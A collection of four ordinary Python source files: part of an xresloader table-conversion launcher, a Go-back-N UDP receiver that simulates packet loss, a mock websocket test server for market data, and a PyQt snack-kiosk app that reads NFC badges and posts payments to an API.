xconv_options['args']['-o'] = '"' + text_value + '"'
elif tag_name == 'data_src_dir':
xconv_options['args']['-d'] = '"' + text_value + '"'
elif tag_name == 'rename':
xconv_options['args']['-n'] = '"' + trip_value + '"'
elif tag_name == 'option':
xconv_options['ext_args_l1'].append(trip_value)
elif tag_name == 'java_option':
xconv_options['java_options'].append(trip_value)
elif tag_name == 'default_scheme':
if 'name' in global_option.attrib:
scheme_key = global_option.attrib['name']
if scheme_key in xconv_options['default_scheme']:
xconv_options['default_scheme'][scheme_key].append(
trip_value)
else:
xconv_options['default_scheme'][
scheme_key] = [text_value]
else:
print('[ERROR] unknown global configure ' + tag_name)
if xconv_xml_global_nodes and len(xconv_xml_global_nodes) > 0:
load_global_options(xconv_xml_global_nodes)
# ----------------------------------------- 全局配置解析 -----------------------------------------
conv_list_dir = os.path.dirname(xconv_options['conv_list'])
if conv_list_dir:
os.chdir(conv_list_dir)
os.chdir(xconv_options['work_dir'])
cprintf_stdout([print_style.FC_YELLOW],
'[NOTICE] start to run conv cmds on dir: {0}' + os.linesep,
os.getcwd())
if not os.path.exists(xconv_options['xresloader_path']):
print(os.getcwd())
cprintf_stderr([print_style.FC_RED],
'[ERROR] xresloader not found.({0})' + os.linesep,
xconv_options['xresloader_path'])
exit(-4)
# ========================================= 转换表配置解析 =========================================
# 转换项配置解析/合并
def load_list_item_nodes(lis):
for item in lis:
conv_item_obj = {
'file': False,
'scheme': False,
'options': [],
'enable': False,
'scheme_data': {}
}
if 'file' in item.attrib:
conv_item_obj['file'] = item.attrib['file']
if 'scheme' in item.attrib:
conv_item_obj['scheme'] = item.attrib['scheme']
# 局部选项
for local_option in item.findall('./option'):
text_value = local_option.text
if text_value:
trip_value = text_value.strip()
else:
trip_value = None
if not trip_value:
continue
conv_item_obj['options'].append(trip_value)
# 局部选项
for local_option in item.findall('./scheme'):
text_value = local_option.text
if text_value:
trip_value = text_value.strip()
else:
trip_value = None
if not trip_value:
continue
if 'name' in local_option.attrib:
scheme_key = local_option.attrib['name']
if scheme_key and scheme_key in conv_item_obj['scheme_data']:
conv_item_obj['scheme_data'][scheme_key].append(text_value)
else:
conv_item_obj['scheme_data'][scheme_key] = [text_value]
for key in xconv_options['default_scheme']:
if key not in conv_item_obj['scheme_data']:
conv_item_obj['scheme_data'][key] = xconv_options[
'default_scheme'][key]
# 转换规则
if not options.rule_schemes or 0 == len(
options.rule_schemes) or conv_item_obj[
'scheme'] in options.rule_schemes:
conv_item_obj['enable'] = True
xconv_options['item'].append(conv_item_obj)
if xconv_xml_list_item_nodes and len(xconv_xml_list_item_nodes) > 0:
load_list_item_nodes(xconv_xml_list_item_nodes)
# ----------------------------------------- 转换配置解析 -----------------------------------------
# ========================================= 生成转换命令 =========================================
##### 全局命令和配置
global_cmd_prefix = ''
for global_optk in xconv_options['args']:
global_optv = xconv_options['args'][global_optk]
global_cmd_prefix += ' ' + global_optk + ' ' + global_optv
if len(xconv_options['ext_args_l1']) > 0:
global_cmd_prefix += ' ' + ' '.join(xconv_options['ext_args_l1'])
##### 命令行参数
global_cmd_suffix = ''
if len(xconv_options['ext_args_l2']) > 0:
global_cmd_suffix += ' ' + ' '.join(xconv_options['ext_args_l2'])
cmd_list = []
for conv_item in xconv_options['item']:
if not conv_item['enable']:
continue
item_cmd_options = ''
if len(conv_item['options']) > 0:
item_cmd_options += ' ' + ' '.join(conv_item['options'])
if conv_item['file'] and conv_item['scheme']:
cmd_scheme_info = ' -s "{:s}" -m "{:s}"'.format(conv_item['file'],
conv_item['scheme'])
else:
cmd_scheme_info = ''
for key in conv_item['scheme_data']:
for opt_val in conv_item['scheme_data'][key]:
cmd_scheme_info += ' -m "{:s}={:s}"'.format(key, opt_val)
run_cmd = global_cmd_prefix + item_cmd_options + cmd_scheme_info + global_cmd_suffix
cmd_list.append(run_cmd)
cmd_list.reverse()
# ----------------------------------------- 生成转换命令 -----------------------------------------
exit_code = 0
all_worker_thread = []
cmd_picker_lock = threading.Lock()
def worker_func(idx):
global exit_code
java_options = ""
if len(options.java_options) > 0:
java_options += ' "-{0}"'.format('" "-'.join(options.java_options))
if len(xconv_options['java_options']) > 0:
java_options += ' "{0}"'.format('" "'.join(xconv_options[
'java_options']))
pexec = None
if not options.test:
pexec = Popen(
'java {0} -jar "{1}" --stdin'.format(
java_options, xconv_options['xresloader_path']),
stdin=PIPE,
stdout=None,
stderr=None,
shell=True)
while True:
cmd_picker_lock.acquire()
if len(cmd_list) <= 0:
cmd_picker_lock.release()
break
pexec.stdin.write(cmd_list.pop().encode(console_encoding))
cmd_picker_lock.release()
pexec.stdin.write(os.linesep.encode(console_encoding))
pexec.stdin.flush()
pexec.stdin.close()
cmd_exit_code = pexec.wait()
exit_code = exit_code + cmd_exit_code
else:
this_thd_cmds = []
while True:
cmd_picker_lock.acquire()
if len(cmd_list) <= 0:
cmd_picker_lock.release()
break
# python2 must use encode string to bytes or there will be messy code
# python3 must not use encode methed because it will transform string to bytes
if sys.version_info.major < 3:
this_thd_cmds.append(cmd_list.pop().encode(console_encoding))
else:
this_thd_cmds.append(cmd_list.pop())
cmd_picker_lock.release()
cprintf_stdout([print_style.FC_GREEN], (
'java {0} -jar "{1}" --stdin' + os.linesep + '\t>{2}' + os.linesep
).format(java_options, xconv_options['xresloader_path'],
(os.linesep + '\t>').join(this_thd_cmds)))
for i in range(0, options.parallelism):
this_worker_thd = threading.Thread(target=worker_func, args=[i])
this_worker_thd.start()
all_worker_thread.append(this_worker_thd)
# 等待退出
for thd in all_worker_thread:
thd.join()
# ----------------------------------------- 实际开始转换 -----------------------------------------
cprintf_stdout([print_style.FC_MAGENTA],
'[INFO] all jobs done. {0} job(s) failed.{1}'.format(
exit_code, os.linesep))
exit(exit_code)
|
receptor.py
|
import threading
import time
from socket import *
import checksum_udp
# Socket
serverPort = 12000
serverSocket = socket(AF_INET, SOCK_DGRAM)
serverSocket.bind(('', serverPort))
# Go-back-N
delim = '_'
expectedseqnum = 0
corrupted_packet = False
lost_packet = False
delayed_packet = False
errors = True
def spawn():
return threading.Thread(target=receiver_callback)
def receiver_callback():
global expectedseqnum
global corrupted_packet
global delayed_packet
global lost_packet
data, client_address = serverSocket.recvfrom(2048)
t = spawn()
t.start()
seqnum, message, cs = data.split(delim)
checksum_msg = seqnum + delim + message
seqnum = int(seqnum)
# Error simulations
if errors:
if seqnum == 2 and not delayed_packet: # ACK delayed forcing timeout
delayed_packet = True
time.sleep(10)
if seqnum == 5 and not lost_packet: # Packet intentionally lost
lost_packet = True
return
if seqnum == 6 and not corrupted_packet: # Packet corrupted (checksum is shifted to the left by 1 bit)
corrupted_packet = True
cs = (int(cs) << 1).__str__()
print """\nData received! @ %s
Expected sequence number: %d
Data info:
- Sequence Number: [%d]
- Message: %s
- Checksum: %s""" % (time.asctime(), expectedseqnum, seqnum, message, cs)
if expectedseqnum == seqnum and \
checksum_udp.checksum(str.encode(checksum_msg)).__str__() == cs:
new_message = expectedseqnum.__str__() + delim + 'ACK'
print '%s: Response sent: %s to %s\n' % (time.asctime(), new_message, client_address)
serverSocket.sendto(new_message, client_address)
expectedseqnum = expectedseqnum + 1
else:
print '!----------------------------------------------!'
print '!ERROR: Corrupted or unordered packet received.!'
print '!----------------------------------------------!'
lastseqnum = 0 if expectedseqnum == 0 else expectedseqnum - 1
default_message = lastseqnum.__str__() + delim + 'ACK'
print '%s: Response sent: %s to %s\n' % (time.asctime(), default_message, client_address)
serverSocket.sendto(default_message, client_address)
def main():
global expectedseqnum
global corrupted_packet
global delayed_packet
global lost_packet
global errors
answer = raw_input('Simulate errors? (Y/N): ')
errors = True if answer == 'Y' or answer == 'y' else False
print '+---------------------------------+'
print '|The server is ready to receive. |'
print '|Type \'r\' at any time to restart. |'
print '+---------------------------------+'
t = spawn()
t.start()
while True:
restart = raw_input()
if restart == 'r' or restart == 'R':
expectedseqnum = 0
corrupted_packet = False
delayed_packet = False
lost_packet = False
answer = raw_input('Simulate errors? (Y/N): ')
errors = True if answer == 'Y' or answer == 'y' else False
print '+----------------+'
print '|Server restarted|'
print '+----------------+'
if __name__ == "__main__":
main()
|
helper.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
import lzma
import threading
import asyncio
import websockets
from aiohttp import web
class MockInsServer():
def __init__(self, port):
self.loop = asyncio.new_event_loop()
self.port = port
self.thread = threading.Thread(target=self._run)
self.thread.start()
self.stop_signal = self.loop.create_future()
def close(self):
self.loop.call_soon_threadsafe(lambda: self.stop_signal.set_result(0))
self.thread.join()
async def handle(self, request):
data = {
"SHFE.cu1901": {
"class": "FUTURE",
"instrument_id": "SHFE.cu1901",
"exchange_id": "SHFE",
"ins_id": "cu1901",
"ins_name": "\u6caa\u94dc1901",
"volume_multiple": 5,
"price_tick": 10,
"price_decs": 0,
"sort_key": 20,
"expired": True,
"py": "ht,hutong,yinjitong",
"product_id": "cu",
"product_short_name": "\u6caa\u94dc",
"delivery_year": 2019,
"delivery_month": 1,
"expire_datetime": 1547535600.0,
"last_price": 46940.0,
"pre_volume": 0,
"open_interest": 0,
"settlement_price": 46880.0,
"max_market_order_volume": 0,
"max_limit_order_volume": 500,
"margin": 16247.0,
"commission": 11.605,
"mmsa": 1,
"trading_time": {
"day": [["09:00:00", "10:15:00"], ["10:30:00", "11:30:00"], ["13:30:00", "15:00:00"]],
"night": [["21:00:00", "25:00:00"]]
}
}
}
return web.json_response(data)
async def task_serve(self):
app = web.Application()
app.add_routes([web.get('/{tail:.*}', self.handle)])
runner = web.AppRunner(app)
await runner.setup()
site = web.TCPSite(runner, '127.0.0.1', self.port)
await site.start()
await self.stop_signal
await runner.cleanup()
def _run(self):
asyncio.set_event_loop(self.loop)
self.loop.run_until_complete(self.task_serve())
class MockServer():
def __init__(self):
self.loop = asyncio.new_event_loop()
self.connections = {}
self.server_md = None
self.server_td = None
self.md_port = 5100
self.td_port = 5200
self._expecting = {}
self.stop_signal = self.loop.create_future()
def close(self):
assert not self._expecting
self.loop.call_soon_threadsafe(lambda: self.stop_signal.set_result(0))
self.thread.join()
async def _handler_md(self, connection, path):
await self.on_connected("md", connection)
try:
while True:
s = await self.connections["md"].recv()
pack = json.loads(s)
await self.on_received("md", pack)
except websockets.exceptions.ConnectionClosedOK as e:
assert e.code == 1000
async def _handler_td(self, connection, path):
await self.on_connected("td", connection)
while True:
s = await self.connections["td"].recv()
pack = json.loads(s)
if pack["aid"] == "peek_message":
continue
await self.on_received("td", pack)
def run(self, script_file_name):
self.script_file_name = script_file_name
self.thread = threading.Thread(target=self._run)
self.thread.start()
async def _server(self):
async with websockets.serve(self._handler_md, "127.0.0.1", self.md_port) as self.server_md:
async with websockets.serve(self._handler_td, "127.0.0.1", self.td_port) as self.server_td:
await self.stop_signal
def _run(self):
self.script_file = lzma.open(self.script_file_name, "rt", encoding="utf-8")
asyncio.set_event_loop(self.loop)
self.loop.run_until_complete(self._server())
async def _process_script(self):
# 每次处理日志文件中的一行, 直至需要输入为止
self._expecting = {}
for line in self.script_file:
# 2019-09-09 16:22:40,652 - DEBUG - websocket message sent to wss://openmd.shinnytech.com/t/md/front/mobile: {"aid": "subscribe_quote",
item = {}
if "websocket message sent" in line and "peek_message" not in line:
item["type"] = "sent"
elif "websocket message received" in line:
item["type"] = "received"
else:
continue
if "openmd" in line:
item["source"] = "md"
elif "opentd" in line:
item["source"] = "td"
else:
raise Exception()
content_start_pos = line.find("{")
content = line[content_start_pos:]
item["content"] = json.loads(content)
if item["type"] == "sent":
self._expecting = item
break
elif item["type"] == "received":
msg = json.dumps(item["content"])
assert self.connections[item["source"]]
await self.connections[item["source"]].send(msg)
async def on_connected(self, source, connection):
self.connections[source] = connection
# self._process_script()
# assert self._expecting["source"] == source
# assert self._expecting["action"] == "connected"
async def on_received(self, source, pack):
if not self._expecting:
await self._process_script()
if pack["aid"] != "peek_message":
assert self._expecting["source"] == source
assert self._expecting["content"] == pack
await self._process_script()
|
app.py
|
from PyQt5 import QtCore, QtGui, QtWidgets
from multiprocessing import Pipe
from threading import Thread
import sys, random, math, json, time, requests, subprocess
class laclef_window(QtWidgets.QMainWindow):
clicked = QtCore.pyqtSignal()
scanned = QtCore.pyqtSignal(int)
def __init__(self):
super(laclef_window, self).__init__()
self.rpi = False # Set to True if run this code on your RPI
self.test = True # Set to False if you are going to use it for real
self.default_width = 800
self.default_height = 480
self.waiting_for_confirmation = False
self.on_error_page = False
self.uid = ''
self.uid_test = '2a3b7710'
f = open('items.json', 'r')
self.items = json.load(f)
f.close()
self.default_font = 'Kreon'
self.user_name = "Default D."
self.user_solde = 50.0
self.snack_id = 1
self.setupUi(self)
self.setupHome(self)
self.setupErrorPage(self)
self.setupChoices(self)
self.setupDetails(self)
self.setupConfirmation(self)
self.showHome()
#self.showChoices()
def setupUi(self, Frame):
Frame.setObjectName("Frame")
Frame.resize(self.default_width, self.default_height)
font = QtGui.QFont()
font.setFamily(self.default_font)
font.setPointSize(34)
Frame.setFont(font)
def setupHome(self, Frame):
self.frame_homepage = QtWidgets.QFrame(Frame)
self.frame_homepage.setGeometry(QtCore.QRect(0, 0, self.default_width, self.default_height))
self.frame_homepage.setObjectName("frame_homepage")
self.frame_homepage.setAutoFillBackground(True)
self.frame_homepage.setStyleSheet("background: rgba(255, 255, 255, 255);")
self.homepage_label = QtWidgets.QLabel(self.frame_homepage)
self.homepage_label.setGeometry(QtCore.QRect(20, 140, 481, 197))
font = QtGui.QFont()
font.setFamily(self.default_font)
font.setPointSize(34)
self.homepage_label.setFont(font)
self.homepage_label.setAlignment(QtCore.Qt.AlignCenter)
self.homepage_label.setObjectName("homepage_label")
self.homepage_label.setText("Badgez ici \n SVP")
self.widget_home = QtWidgets.QLabel(self.frame_homepage)
self.widget_home.setGeometry(QtCore.QRect(550, 130, 220, 220))
self.widget_home.setObjectName("widget_home")
pic = QtGui.QMovie('imgs/home.gif')
self.widget_home.setMovie(pic)
pic.start()
self.frame_homepage.hide()
def showHome(self):
self.frame_homepage.show()
Thread(target=self.checkForBadge).start()
def hideHome(self):
self.frame_homepage.hide()
def setupErrorPage(self, Frame):
self.frame_errorpage = QtWidgets.QFrame(Frame)
self.frame_errorpage.setGeometry(QtCore.QRect(0, 0, self.default_width, self.default_height))
self.frame_errorpage.setObjectName("frame_errorpage")
self.frame_errorpage.setAutoFillBackground(True)
self.frame_errorpage.setStyleSheet("background: rgba(255, 255, 255, 255);")
self.errorpage_label_up = QtWidgets.QLabel(self.frame_errorpage)
self.errorpage_label_up.setGeometry(QtCore.QRect(40, 140, 481, 51))
self.errorpage_label_up.setAlignment(QtCore.Qt.AlignCenter)
self.errorpage_label_down = QtWidgets.QLabel(self.frame_errorpage)
self.errorpage_label_down.setGeometry(QtCore.QRect(40, 280, 481, 61))
self.errorpage_label_down.setAlignment(QtCore.Qt.AlignCenter)
self.errorpage_label_number = QtWidgets.QLabel(self.frame_errorpage)
self.errorpage_label_number.setGeometry(QtCore.QRect(40, 180, 481, 91))
self.errorpage_label_number.setAlignment(QtCore.Qt.AlignCenter)
self.errorpage_label_alert = QtWidgets.QLabel(self.frame_errorpage)
self.errorpage_label_alert.setGeometry(QtCore.QRect(0, 410, self.default_width, 20))
self.errorpage_label_alert.setAlignment(QtCore.Qt.AlignCenter)
font1 = QtGui.QFont()
font1.setFamily(self.default_font)
font1.setPointSize(11)
font2 = QtGui.QFont()
font2.setFamily(self.default_font)
font2.setPointSize(34)
font3 = QtGui.QFont()
font3.setFamily(self.default_font)
font3.setPointSize(10)
self.errorpage_label_up.setFont(font1)
self.errorpage_label_down.setFont(font1)
self.errorpage_label_number.setFont(font2)
self.errorpage_label_alert.setFont(font3)
self.widget_error = QtWidgets.QLabel(self.frame_errorpage)
self.widget_error.setGeometry(QtCore.QRect(550, 130, 220, 220))
self.widget_error.setObjectName("widget_error")
pic = QtGui.QMovie('imgs/error.gif')
self.widget_error.setMovie(pic)
pic.start()
self.frame_errorpage.hide()
def showErrorPage(self, nbr):
self.errorpage_label_up.setText("Ton badge n'est pas reconnu")
self.errorpage_label_number.setText(f"{nbr}")
self.errorpage_label_down.setText("Envoie le code ci-dessus à \n baptiste.gaultier@imt-atlantique.fr \n Il saura quoi faire")
self.errorpage_label_alert.setText("Touchez l'écran pour revenir à l'acceuil")
self.on_error_page = True
self.frame_errorpage.show()
def showErrorNetwork(self):
self.errorpage_label_up.setText("Réseau indisponible !")
self.errorpage_label_number.setText("")
self.errorpage_label_down.setText("Contactez \n baptiste.gaultier@imt-atlantique.fr \n Il saura quoi faire")
self.errorpage_label_alert.setText("Touchez l'écran pour revenir à l'acceuil")
self.on_error_page = True
self.frame_errorpage.show()
def hideErrorPage(self):
self.frame_errorpage.hide()
def setupChoices(self, Frame):
self.frame_choices = QtWidgets.QFrame(Frame)
self.frame_choices.setGeometry(QtCore.QRect(0, 0, self.default_width, self.default_height))
self.frame_choices.setObjectName("frame_choices")
self.frame_choices.setTabletTracking(True)
self.layoutWidget = QtWidgets.QWidget(self.frame_choices)
self.layoutWidget.setGeometry(QtCore.QRect(3, 111, 801, 291))
self.layoutWidget.setObjectName("layoutWidget")
self.frame_choices.setStyleSheet("background: rgba(252, 254, 252, 255);")
self.Layout_choices = QtWidgets.QVBoxLayout(self.frame_choices)
self.Layout_choices.setSpacing(10)
self.Layout_choices.setObjectName("Layout_choices")
self.choices_label = QtWidgets.QLabel(self.frame_choices)
font = QtGui.QFont()
font.setFamily(self.default_font)
font.setPointSize(17)
self.choices_label.setFont(font)
self.choices_label.setLineWidth(1)
self.choices_label.setGeometry(QtCore.QRect(0, 20, 800, 81))
self.choices_label.setAlignment(QtCore.Qt.AlignCenter)
self.choices_label.setObjectName("label")
self.gridLayoutWidget = QtWidgets.QWidget(self.frame_choices)
self.gridLayoutWidget.hide()
self.gridLayoutWidget.setObjectName("gridLayoutWidget")
self.gridLayoutWidget.setGeometry(QtCore.QRect(10, 120, 800, 400))
self.gridLayout = QtWidgets.QGridLayout(self.gridLayoutWidget)
self.gridLayout.setSizeConstraint(QtWidgets.QLayout.SetNoConstraint)
self.widget_choices = QtWidgets.QLabel(self.frame_choices)
self.widget_choices.setGeometry(QtCore.QRect(0, 0, 101, 101))
self.widget_choices.setObjectName("widget_home")
pic = QtGui.QMovie('imgs/hey.gif')
self.widget_choices.setMovie(pic)
pic.start()
j = 0
k = 0
self.buttons = {}
layout_pos = [(30, 130), (280, 130), (530, 130),
(30, 270), (280, 270), (530, 270)]
# Create buttons
for i in range(6):
b = QtWidgets.QPushButton(self.frame_choices)
b.setMinimumSize(QtCore.QSize(0, 125))
b.setObjectName(str(i))
b.setText("bouton{}".format(i))
f = QtGui.QFont()
f.setFamily(self.default_font)
f.setPointSize(11)
b.setFont(f)
b.setStyleSheet("border-radius: 5px; border:2px solid black; background: white;")
b.setStyleSheet("background: solid grey;")
self.buttons['button{}'.format(i)] = b
self.buttons['button{}'.format(i)].setGeometry(QtCore.QRect(layout_pos[i][0], layout_pos[i][1], 231, 125))
k = k + 1 if k < 2 else 0
j = 1 if i > 1 else 0
self.choices_button_back = QtWidgets.QPushButton(self.frame_choices)
self.choices_button_back.setGeometry(QtCore.QRect(270, 430, 271, 25))
self.choices_button_back.setFlat(True)
f = QtGui.QFont()
f.setFamily(self.default_font)
f.setPointSize(11)
self.choices_button_back.setFont(f)
self.frame_choices.hide()
def showChoices(self):
#Set user name
self.choices_label.setText("Salut {} ! \n On prend quoi aujourd\'hui ?".format(self.user_name))
self.choices_button_back.setText("<-- Je ne prend rien finalement...")
for i in range(6):
self.buttons['button{}'.format(i)].setText(self.items[i]['desc'])
self.buttons['button{}'.format(i)].setObjectName(self.items[i]['id'])
self.buttons['button0'].clicked.connect(lambda: self.hideChoices(self.buttons['button0']))
self.buttons['button1'].clicked.connect(lambda: self.hideChoices(self.buttons['button1']))
self.buttons['button2'].clicked.connect(lambda: self.hideChoices(self.buttons['button2']))
self.buttons['button3'].clicked.connect(lambda: self.hideChoices(self.buttons['button3']))
self.buttons['button4'].clicked.connect(lambda: self.hideChoices(self.buttons['button4']))
self.buttons['button5'].clicked.connect(lambda: self.hideChoices(self.buttons['button5']))
self.choices_button_back.clicked.connect(self.backHome)
self.frame_choices.show()
def backHome(self):
self.frame_choices.hide()
self.showHome()
def hideChoices(self, id):
print('yep')
self.frame_choices.hide()
self.snack_id = id.objectName()
self.showDetails(self, self.snack_id)
def setupDetails(self, Frame):
self.frame_details = QtWidgets.QFrame(Frame)
self.frame_details.setGeometry(QtCore.QRect(0, 0, self.default_width, self.default_height))
self.frame_details.setObjectName("frame_details")
self.frame_details.setStyleSheet("background: rgb(252, 254, 252);")
self.label_detail_price_calcul = QtWidgets.QLabel(self.frame_details)
self.label_detail_price_calcul.setGeometry(QtCore.QRect(280, 230, 281, 41))
self.label_detail_price_calcul.setAlignment(QtCore.Qt.AlignCenter)
self.label_detail_price_calcul.setObjectName("label_detail_price_calcul")
self.label_detail = QtWidgets.QLabel(self.frame_details)
self.label_detail.setGeometry(QtCore.QRect(10, 130, 151, 221))
self.label_detail.setAlignment(QtCore.Qt.AlignCenter)
self.label_detail.setObjectName("label")
font_2 = QtGui.QFont()
font_2.setPointSize(11)
font_2.setFamily(self.default_font)
self.label_detail.setFont(font_2)
self.button_validate = QtWidgets.QPushButton(self.frame_details)
self.button_validate.setGeometry(QtCore.QRect(280, 300, 281, 57))
self.button_validate.setObjectName("button_validate")
self.button_validate.setFont(font_2)
self.button_validate.setStyleSheet("border-radius: 5px; border:4px solid black;")
self.label_detail_price = QtWidgets.QLabel(self.frame_details)
self.label_detail_price.setGeometry(QtCore.QRect(280, 110, 281, 121))
font = QtGui.QFont()
font.setPointSize(70)
font.setFamily(self.default_font)
self.label_detail_price.setFont(font)
self.label_detail_price.setTextFormat(QtCore.Qt.PlainText)
self.label_detail_price.setAlignment(QtCore.Qt.AlignCenter)
self.label_detail_price.setObjectName("label_detail_price")
self.button_minus = QtWidgets.QPushButton(self.frame_details)
self.button_minus.setGeometry(QtCore.QRect(170, 270, 89, 89))
self.button_minus.setObjectName("button_minus")
self.button_minus.setText("")
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap("imgs/moins.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.button_minus.setIcon(icon)
self.button_minus.setIconSize(QtCore.QSize(30, 30))
#self.button_minus.setFont(font_2)
self.button_minus.setStyleSheet("border-radius: 44px; border:4px solid black;")
self.button_back = QtWidgets.QPushButton(self.frame_details)
self.button_back.setGeometry(QtCore.QRect(0, 20, 50, 50))
self.button_back.setObjectName("button_back")
self.button_back.setText("")
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap("imgs/back.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.button_back.setIcon(icon)
self.button_back.setFlat(True)
self.button_back.setFont(font_2)
self.button_plus = QtWidgets.QPushButton(self.frame_details)
self.button_plus.setGeometry(QtCore.QRect(170, 130, 89, 89))
self.button_plus.setObjectName("button_plus")
self.button_plus.setText("")
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap("imgs/plus.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.button_plus.setIcon(icon)
self.button_plus.setIconSize(QtCore.QSize(30, 30))
#self.button_plus.setFont(font_2)
self.button_plus.setStyleSheet("border-radius: 44px; border:4px solid black;")
self.label_detail_price_calcul.setFont(font_2)
self.widget_details = QtWidgets.QLabel(self.frame_details)
self.widget_details.setGeometry(QtCore.QRect(580, 130, 201, 201))
self.widget_details.setObjectName("widget_details")
pic = QtGui.QMovie('imgs/select.gif')
self.widget_details.setMovie(pic)
pic.start()
self.button_plus.clicked.connect(lambda : self.addItem(1))
self.button_minus.clicked.connect(lambda : self.removeItem(1))
self.button_validate.clicked.connect(lambda : self.validate(1))
self.button_back.clicked.connect(self.back)
self.frame_details.hide()
def showDetails(self, Frame, id):
#Get item price and infos
self.price = next((float(self.items[i]['price']) for i in range(6) if self.items[i]['id'] == id), 0)
self.nbr = 1
detail_name = next((self.items[i]['desc'] for i in range(6) if self.items[i]['id'] == id), 0)
self.label_detail_price_calcul.setText("({}x{}€)".format(self.nbr, self.price))
self.label_detail_price.setText("{}€".format(str(round(self.nbr*self.price,3))))
self.label_detail.setText(detail_name)
self.button_validate.setText("Valider")
self.frame_details.show()
def addItem(self, id):
self.nbr = self.nbr + 1
self.label_detail_price.setText("{}€".format(str(round(self.nbr*self.price,3))))
self.label_detail_price_calcul.setText("({}x{}€)".format(self.nbr, self.price))
def removeItem(self, id):
self.nbr = self.nbr - 1 if self.nbr - 1 > 0 else 0
self.label_detail_price.setText("{}€".format(str(round(self.nbr*self.price,3))))
self.label_detail_price_calcul.setText("({}x{}€)".format(self.nbr, self.price))
def validate(self, id):
self.frame_details.hide()
self.showConfirmation(self)
def back(self):
self.frame_details.hide()
self.showChoices()
def setupConfirmation(self, Frame):
self.frame_confirmation = QtWidgets.QFrame(Frame)
self.frame_confirmation.setGeometry(QtCore.QRect(0, 0, self.default_width, self.default_height))
self.frame_confirmation.setObjectName("frame_confirmation")
self.frame_confirmation.setStyleSheet("background: rgb(249, 252, 249);")
self.label_solde = QtWidgets.QLabel(self.frame_confirmation)
self.label_solde.setGeometry(QtCore.QRect(0, 280, 531, 111))
self.label_solde.setAlignment(QtCore.Qt.AlignCenter)
self.label_solde.setObjectName("label_solde")
font2 = QtGui.QFont()
font2.setFamily(self.default_font)
font2.setPointSize(17)
self.label_solde.setFont(font2)
self.label_confirmation = QtWidgets.QLabel(self.frame_confirmation)
self.label_confirmation.setGeometry(QtCore.QRect(0, 126, 531, 191))
self.label_confirmation.setAlignment(QtCore.Qt.AlignCenter)
self.label_confirmation.setObjectName("label_confirmation")
font = QtGui.QFont()
font.setFamily(self.default_font)
font.setPointSize(49)
self.label_confirmation.setFont(font)
self.label_alert = QtWidgets.QLabel(self.frame_confirmation)
self.label_alert.setGeometry(QtCore.QRect(0, 400, self.default_width, 20))
self.label_alert.setAlignment(QtCore.Qt.AlignCenter)
self.label_alert.setObjectName("label_alert")
font3 = QtGui.QFont()
font3.setFamily(self.default_font)
font3.setPointSize(10)
self.label_alert.setFont(font3)
self.widget_confirmation = QtWidgets.QLabel(self.frame_confirmation)
self.widget_confirmation.setGeometry(QtCore.QRect(550, 130, 220, 220))
self.widget_confirmation.setObjectName("widget_confirmation")
pic = QtGui.QMovie('imgs/bisou.gif')
self.widget_confirmation.setMovie(pic)
pic.start()
self.frame_confirmation.hide()
def showConfirmation(self, Frame):
#self.user_solde = self.pay(self.uid_test if self.test else self.uid, self.snack_id, self.nbr)
self.label_confirmation.setText("Merci \n{} !".format(self.user_name))
self.label_solde.setText("Un instant ...")
self.label_alert.setText("Touchez l'écran pour revenir à l'acceuil")
self.waiting_for_confirmation = True
self.frame_confirmation.show()
Thread(target=self.async_paiement, args=(self.uid_test if self.test else self.uid, self.snack_id, self.nbr)).start()
def mousePressEvent(self, event):
if event.buttons() & QtCore.Qt.LeftButton:
print(event.pos())
print("blahblah")
if self.waiting_for_confirmation:
self.frame_confirmation.hide()
self.showHome()
self.waiting_for_confirmation = False
elif self.on_error_page:
self.hideErrorPage()
self.showHome()
self.on_error_page = False
def async_paiement(self, uid, snack_id, qty):
self.user_solde = self.pay(uid,snack_id,qty)
self.label_solde.setText("Ton nouveau solde est de {}€".format(self.user_solde))
def updateData(self):
req = requests.get('http://api.laclef.cc/snacks')
items = [(e['id'], e['description_fr_FR'], e['price']) for e in req.json()['response'] if e['visible'] == '1']
f = open('items.json', 'w')
f.write(json.dumps(items))
f.close()
def pay(self, uid, snack_id, qty):
data = {"uid":uid,"service":1,"order":{"snack_{}".format(snack_id):qty}}
req = requests.post('http://api.laclef.cc/swipes/2', data=json.dumps(data))
print(req.json())
return req.json()['balance']
def getUserInfos(self, uid):
try:
req = requests.get('http://api.laclef.cc/tags/{}'.format(uid))
except Exception as e:
return (None,)
print(req.json()['response'])
if req.json()['response']['owner'] is None:
return None
else:
name = "{} {}.".format(req.json()['response']['owner']['firstname'].capitalize(),req.json()['response']['owner']['lastname'][0].upper())
balance = req.json()['response']['owner']['balance']
return (name, balance)
def checkForBadge(self):
print("start the polling...")
self.scan() if self.rpi else self.scan_test()
def scan(self):
while True:
lines=subprocess.check_output("/usr/bin/nfc-poll", stderr=open('/dev/null','w'))
uid = next((line.decode().replace(' ','').split(':')[1] for line in lines.splitlines() if b'UID' in line), None)
if uid != None:
self.buzz()
print('Uid: {} '.format(uid))
#uid = uid[:7].replace('0','')
#print(f'Uid (Legacy Code): {uid}')
self.uid = uid
user_infos = self.getUserInfos(self.uid_test if self.test else self.uid)
if user_infos is None:
self.scanned.emit(2)
elif len(user_infos) == 1:
self.scanned.emit(3)
else:
self.user_name = user_infos[0]
self.user_solde = user_infos[1]
self.scanned.emit(1)
break
def buzz(self):
import RPi.GPIO as GPIO
from time import sleep
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
buzzer_pin = 23
timeout = 0.001
stop = 100
count = 0
GPIO.setup(buzzer_pin, GPIO.OUT)
while True:
GPIO.output(buzzer_pin, GPIO.HIGH)
sleep(timeout)
GPIO.output(buzzer_pin, GPIO.LOW)
sleep(timeout)
GPIO.output(buzzer_pin, GPIO.HIGH)
sleep(timeout)
count += 1
if count == stop:
break
def scan_test(self):
while True:
f = open('test.json', 'r')
data = json.load(f)
f.close()
print(data['id'])
# 0: nothing happend, 1: badge exists in db, 2: badge unknown
if data['id'] == 1:
user_infos = self.getUserInfos(self.uid_test)
if user_infos is None:
self.scanned.emit(2)
elif len(user_infos) == 1:
self.scanned.emit(3)
else:
self.user_name = user_infos[0]
self.user_solde = user_infos[1]
self.scanned.emit(1)
break
else:
print("Nope")
time.sleep(3)
